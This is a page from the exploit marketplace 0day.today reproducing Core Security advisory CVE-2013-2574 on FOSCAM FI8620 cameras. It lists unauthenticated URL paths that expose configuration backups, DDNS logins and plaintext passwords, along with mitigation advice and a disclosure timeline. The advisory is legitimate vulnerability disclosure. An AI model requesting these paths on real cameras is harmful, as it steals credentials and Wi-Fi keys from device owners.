0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FOSCAM IP-Cameras Improper Access Restrictions
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
FOSCAM IP-Cameras Improper Access Restrictions 1. *Advisory Information* Title: FOSCAM IP-Cameras Improper Access Restrictions Advisory ID: CORE-2013-0613 Advisory URL: http://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions Date published: 2013-07-23 Date of last update: 2013-07-23 Vendors contacted: Foscam Release mode: User release 2. *Vulnerability Information* Class: Information Exposure [CWE-200] Impact: Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2574 3. *Vulnerability Description* Due to improper access restriction the FOSCAM FI8620 device [1] allows a remote attacker to browse and access arbitrary files from the following directories '/tmpfs/' and '/log/' without requiring authentication. This could allow a remote attacker to obtain valuable information such as access credentials, Wi-Fi configuration and other sensitive information in plain text. The list of affected files includes, but is not limited to, the following: . 'http://<target_ip>/tmpfs/config_backup.bin' . 'http://<target_ip>/tmpfs/config_restore.bin' . 'http://<target_ip>/tmpfs/ddns.conf' . 'http://<target_ip>/tmpfs/syslog.txt' . 'http://<target_ip>/log/syslog.txt' 4. *Vulnerable Packages* . FOSCAM FI8620 PTZ Camera. . Other Foscam devices based on the same firmware are probably affected too, but they were not checked. 5. *Non-Vulnerable Packages* Vendor did not provide details. Contact Foscam for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Foscam after several attempts (see [Sec. 9]); contact vendor for further information. Some mitigation actions may be do not expose the camera to internet unless absolutely necessary and have at least one proxy filtering HTTP requests to the following resources: . '/tmpfs/config_backup.bin' . '/tmpfs/config_restore.bin' . '/tmpfs/ddns.conf' . '/tmpfs/syslog.txt' . '/log/syslog.txt' 7. *Credits* This vulnerability was discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Accessing Manufacturer DDNS configuration* By requesting the following URL using your default web browser: /----- http://<target_ip>/tmpfs/ddns.conf -----/ you will see something like this: /----- [LoginInfo] HostName=ddns.myfoscam.org HostIP=113.105.65.47 Port=8080 UserName=<target username> Password=<target plain password> [Domain] Domain=<target username>.myfoscam.org; -----/ 8.2. *Access Credentials Stored in Backup Files* When a configuration backup is required by an operator/administrator, the backup is generated in the local folder 'tmpfs' named as 'config_backup.bin'. The binary file is just a dump of the whole configuration packed as Gzip and can be accessed by accessing the following URL: /----- http://<target_ip>/tmpfs/config_backup.bin -----/ The presence of this temporary file enables an unauthenticated attacker to download the configuration files which contain usernames, plaintext passwords (including admin passwords), Wifi configuration including plain PSK, among other interesting stuff as shown below: /----- username = "admin " password = "admin " authtype = "15 " authgroup = " " [user1] username = "user " password = "user " authtype = "3 " authgroup = " " [user2] username = "guest " password = "guest " authtype = "1 " authgroup = " " -----/ It is important to mention that, in order to access the configuration file previously mentioned, an operator and/or administrator should have executed the backup process in advance. 9. *Report Timeline* . 2013-06-12: Core Security Technologies notifies the Foscam team of the vulnerability. . 2013-06-12: Vendor acknowledges the receipt of the email and asks for technical details. . 2013-06-13: A draft report with technical details and a PoC is sent to vendor. Publication date is set for Jul 3rd, 2013. . 2013-06-17: Core asks if the vulnerabilities are confirmed. . 2013-06-17: Foscam product team notifies that they have checked CORE's website [2], but there is no Foscam info. . 2013-06-18: Core notifies that the advisory has not been published yet and re-sends technical details and proof of concept. . 2013-06-26: CORE asks for a reply. . 2013-07-03: First release date missed. . 2013-07-03: Core asks for a reply. . 2013-07-11: Core notifies that the issues were reported 1 month ago and there was no reply since [2013-06-18]. . 2013-07-23: Core releases the advisory CORE-2013-0613 tagged as user-release. 10. *References* [1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176. [2] CORE Security Advisories http://www.coresecurity.com/grid/advisories. # 0day.today [2024-09-28] #